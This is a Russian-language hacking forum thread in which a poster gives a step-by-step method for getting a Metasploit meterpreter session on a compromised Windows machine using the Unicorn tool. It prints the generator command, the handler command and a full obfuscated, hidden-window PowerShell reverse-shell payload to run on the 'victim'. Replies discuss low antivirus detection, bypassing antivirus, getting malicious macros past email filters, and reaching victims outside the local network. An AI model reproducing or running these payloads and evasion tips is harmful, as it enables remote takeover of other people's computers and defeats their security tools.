Быстрый способ получить meterpreter

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#1
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git

Запускаем.Смотрим help.

Выполняем команду
Код:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.137.137 443

Получаем два интересных нам файла:
unicorn.rc - скрипт автоматизации вводимых команд для метасплоита(что бы юзер вручную не вводил настройки типа set LHOST , use exploit/multi/handler ... )
powershell_attack.txt -- сама команда для powershell. (Ее нужно скопировать в буфер и запустить на стороне жертвы)

У себя выполняем
Код:
msfconsole -r unicorn.rc
У жертвы команду из powershell_attack.txt
Код:
powershell -window hidden -e JABIAFEAUQAgAD0AIAAnACQAUgBOAG8AIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUgBOAG8AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4AGYANgAsADAAeAAxADIALAAwAHgAMAA1ACwAMAB4ADgANQAsADAAeABkADkALAAwAHgAYwBhACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAZgA5ACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgANwA5ACwAMAB4AGUAZAAsADAAeAA3ADcALAAwAHgAZgBhACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAMQA3ACwAMAB4ADcAMgAsADAAeAA2ADQALAAwAHgAZABjACwAMAB4ADEANwAsADAAeABlADAALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeABhADgALAAwAHgANgAyACwAMAB4AGEAMAAsADAAeAA2ADIALAAwAHgANAAzACwAMAB4ADIANgAsADAAeAA1ADEALAAwAHgAZgAxACwAMAB4ADIAMQAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4AGIAMgAsADAAeAA4AGMALAAwAHgAYwA5ACwAMAB4ADUAOQAsADAAeAA0ADMALAAwAHgAYgBjACwAMAB4ADIAYQAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGIAZgAsADAAeAA3AGUALAAwAHgAZABiACwAMAB4AGYANgAsADAAeAAwAGYALAAwAHgANwAzACwAMAB4ADEAYQAsADAAeAAzAGYALAAwAHgANgBkACwAMAB4ADcAZQAsADAAeAA0AGUALAAwAHgAZQA4ACwAMAB4AGYAOQAsADAAeAAyAGQALAAwAHgANwBmACwAMAB4ADkAZAAsADAAeABiADQALAAwAHgAZQBkACwAMAB4AGYANAAsADAAeABlAGQALAAwAHgANQA5ACwAMAB4ADcANgAsADAAeABlADgALAAwAHgAYQA1ACwAMAB4ADUAOAAsADAAeAA1ADcALAAwAHgAYgBmACwAMAB4AGIAZQAsADAAeAAwADIALAAwAHgANwA3ACwAMAB4ADQAMQAsADAAeAAxADMALAAwAHgAMwBmACwAMAB4ADMAZQAsADAAeAA1ADkALAAwAHgANwAwACwAMAB4ADcAYQAsADAAeAA4ADgALAAwAHgAZAAyACwAMAB4ADQAMgAsADAAeABmADAALAAwAHgAMABiACwAMAB4ADMAMwAsADAAeAA5AGIALAAwAHgAZgA5ACwAMAB4AGEAMAAsADAAeAA3AGEALAAwAHgAMQA0ACwAMAB4ADAAOAAsADAAeABiADgALAAwAHgAYgBiACwAMAB4ADkAMgAsADAAeABmADMALAAwAHgAYwBmACwAMAB4AGIANQAsADAAeABlADEALAAwAHgAOABlACwAMAB4AGQANwAsADAAeAAwADEALAAwAHgAOQA4ACwAMAB4ADUANAAsADAAeAA1AGQALAAwAHgAOQAyACwAMAB4ADMAYQAsADAAeAAxAGUALAAwAHgAYwA1ACwAMAB4ADcAZQAsADAAeABiAGIALAAwAHgAZgAzACwAMAB4ADkAMAAsADAAeABmADUALAAwAHgAYgA3ACwAMAB4AGIAOAAsADAAeABkADcALAAwAHgANQAyACwAMAB4AGQAYgAsADAAeAAzAGYALAAwAHgAMwBiACwAMAB4AGUAOQAsADAAeABlADcALAAwAHgAYgA0ACwAMAB4AGIAYQAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4ADgAZQAsADAAeAA5ADgALAAwAHgAOQBhACwAMAB4ADIAYgAsADAAeAA1ADQALAAwAHgAOAAwACwAMAB4AGIAYgAsADAAeAA5ADEALAAwAHgAMwBiACwAMAB4AGIAZAAsADAAeABkAGMALAAwAHgANwBhACwAMAB4AGUAMwAsADAAeAAxAGIALAAwAHgAOQA2ACwAMAB4ADkANgAsADAAeABmADAALAAwAHgAMQAxACwAMAB4AGYANQAsADAAeABmAGUALAAwAHgAMwA1ACwAMAB4ADEAOAAsADAAeAAwADYALAAwAHgAZgBlACwAMAB4ADUAMQAsADAAeAAyAGIALAAwAHgANwA1ACwAMAB4AGMAYwAsADAAeABmAGUALAAwAHgAOAA3ACwAMAB4ADEAMQAsADAAeAA3AGMALAAwAHgANwA2ACwAMAB4ADAAZQAsADAAeABlADUALAAwAHgAOAAzACwAMAB4AGEAZAAsADAAeABmADYALAAwAHgANwA5ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADUAMwAsADAAeABiADgALAAwAHgAMQBhACwAMAB4ADUANwAsADAAeABjAGIALAAwAHgANgA5ACwAMAB4ADIAMwAsADAAeAAzAGMALAAwAHgAMABiACwAMAB4ADkANgAsADAAeABmADYALAAwAHgAYQA5ACwAMAB4ADAAZQAsADAAeAAwADAALAAwAHgAMwA5ACwAMAB4ADgANQAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGQAMQAsADAAeABkADQALAAwAHgAOQBhACwAMAB4ADUAOAAsADAAeAA5ADkALAAwAHgANQAwACwAMAB4ADcAYwAsADAAeAAwAGEALAAwAHgAOABkACwAMAB4ADMAMgAsADAAeABkADEALAAwAHgAZQBhACwAMAB4ADcAZAAsADAAeABmADMALAAwAHgAOAAxACwAMAB4ADgAMgAsADAAeAA5ADcALAAwAHgAZgBjACwAMAB4AGYAZQAsADAAeABiADIALAAwAHgAOQA3ACwAMAB4AGQANgAsADAAeAA5ADYALAAwAHgANQA4ACwAMAB4ADcAOAAsADAAeAA4AGYALAAwAHgAYwBmACwAMAB4AGYANAAsADAAeABlADEALAAwAHgAOABhACwAMAB4ADgANAAsADAAeAA2ADUALAAwAHgAZQBkACwAMAB4ADAAMAAsADAAeABlADEALAAwAHgAYQA1ACwAMAB4ADYANQAsADAAeABhADcALAAwAHgAMQA1ACwAMAB4ADYAYgAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4ADAANQAsADAAeAAxAGIALAAwAHgANwBlACwAMAB4ADkAOQAsADAAeAA3ADQALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAAzADcALAAwAHgAMQAyACwAMAB4ADMAMQAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4AGIANQAsADAAeAA2ADYALAAwAHgAOAAwACwAMAB4AGIAZQAsADAAeABlADAALAAwAHgANAAwACwAMAB4ADAAZgAsADAAeAA0ADAALAAwAHgAYwA3ACwAMAB4AGQAYgAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAOAAsADAAeABiADMALAAwAHgAZQA2ACwAMAB4ADMAOAAsADAAeAAyADkALAAwAHgANAAzACwAMAB4AGIAMQAsADAAeAA1ADIALAAwAHgAMgA5ACwAMAB4ADIAYgAsADAAeAA2ADUALAAwAHgAMAA3ACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANgBhACwAMAB4ADkAMgAsADAAeABlAGUALAAwAHgAYwAzACwAMAB4AGYAZgAsADAAeAAxAGQALAAwAHgANAA3ACwAMAB4AGIAMAAsADAAeABhADgALAAwAHgANwA1ACwAMAB4ADYANQAsADAAeABlAGYALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAA5ADYALAAwAHgAZABhACwAMAB4ADIAMQAsADAAeAAyADUALAAwAHgANAAxACwAMAB4ADIAMgAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQATwBjAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAE8AYwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAGMATgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEgAUQBRACkAKQA7ACQAMQB0AHoAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADAANgBlACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkADAANgBlACAAJAAxAHQAegAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAxAHQAegAgACQAZQAiADsAfQA=


Ловим сессию.
Всем спасибо)


 

kot-gor

Well-Known Member
ELEET
07.09.2016
385
409
39
#2
Добрый вечер..хочу еще добавить что детект уникорна антивирусами очень низкий.я полгода назад его юзал.,с помощью его также можно проводить атаки на базе макросов ,очень понравился данный софт.
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#4
Добрый вечер..хочу еще добавить что детект уникорна антивирусами очень низкий.я полгода назад его юзал.,с помощью его также можно проводить атаки на базе макросов ,очень понравился данный софт.
Макросы и отлично его юзаю для митм атак в качестве hta пейлоада. Сейчас юникорн активно используют для байпаса АВ.
 

kot-gor

Well-Known Member
ELEET
07.09.2016
385
409
39
#5
кстати, в курсе как обойти детект вредоностных макросов, когда их пересылаешь через почту?
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#8
У меня на win7 powershell ругался что слишком длиная строка. И сессию так и не запустил.
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#9
А тестил через что?
У меня на win7 powershell ругался что слишком длиная строка. И сессию так и не запустил.
Если через беконнект ,не исключаю что может в передаваемый буфер может не влезть.
Тогда как вариант юзать invoke-shell code ,о которых я еще напишу потом отдельный пост, или web delivery exploit хватит вполне.
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#10
А тестил через что?

Если через беконнект ,не исключаю что может в передаваемый буфер может не влезть.
Тогда как вариант юзать invoke-shell code ,о которых я еще напишу потом отдельный пост, или web delivery exploit хватит вполне.
web delivery exploit что то я не немного не догнал как его запустить если машина жертвы находится не в моей локальной сети.
 
Симпатии: Понравилось kot-gor

DoberGroup

Хмурый мизантроп
Премиум
13.11.2016
194
123
41
#17
Симпатии: Понравилось id2746

Pushkinmazila

Active Member
20.11.2016
33
16
#18
Ну вполне и динамический сойдет нам ведь нужно только получить сессию а потом закинуть заразу по сильнее
 
Белый - да, а вот выделенный абсолютно не обязательно, динамический менее удобен, но функционал не ограничивает
Я вот задался вопросом а что если я хочу связать с no ip ?
Как тогда писать адресс rhost как в no-ip ?
 
10.01.2017
18
13
#19
~~DarkNode~~ спасибо, все по красоте.

Скажите пожалуйста этим способом можно ли получить сессию meterpreter если "жертва" находится не в моей сети, при наличии белого выделенного ip?
Код:
python unicorn.py windows/meterpreter/reverse_https 192.168.88.4 443
вот так?)
 

DoberGroup

Хмурый мизантроп
Премиум
13.11.2016
194
123
41
#20
Я вот задался вопросом а что если я хочу связать с no ip ?
Как тогда писать адресс rhost как в no-ip ?
Попробуйте переформулировать вопрос, я абсолютно ничего не понял.

На всякий случай, для понимания, вдруг вопрос отпадет сам собой:
no--ip - это один из сервисов DDNS - динамического DNS. У него очень простой принцип работы - компьютер/роутер с динамическим IP периодически его пинает скриптом и на DNS-сервере обновляется A-запись для определенного доменного имени - подставляется тот IP, с которого обратился скрипт.

Если вопрос еще остался, подробнее: кто с кем связывается и причем тут DDNS?
 
если "жертва" находится не в моей сети, при наличии белого выделенного ip?
... то логично же писать белый выделенный ip, правда?
А порт не забыть пробросить на роутере к локальному ip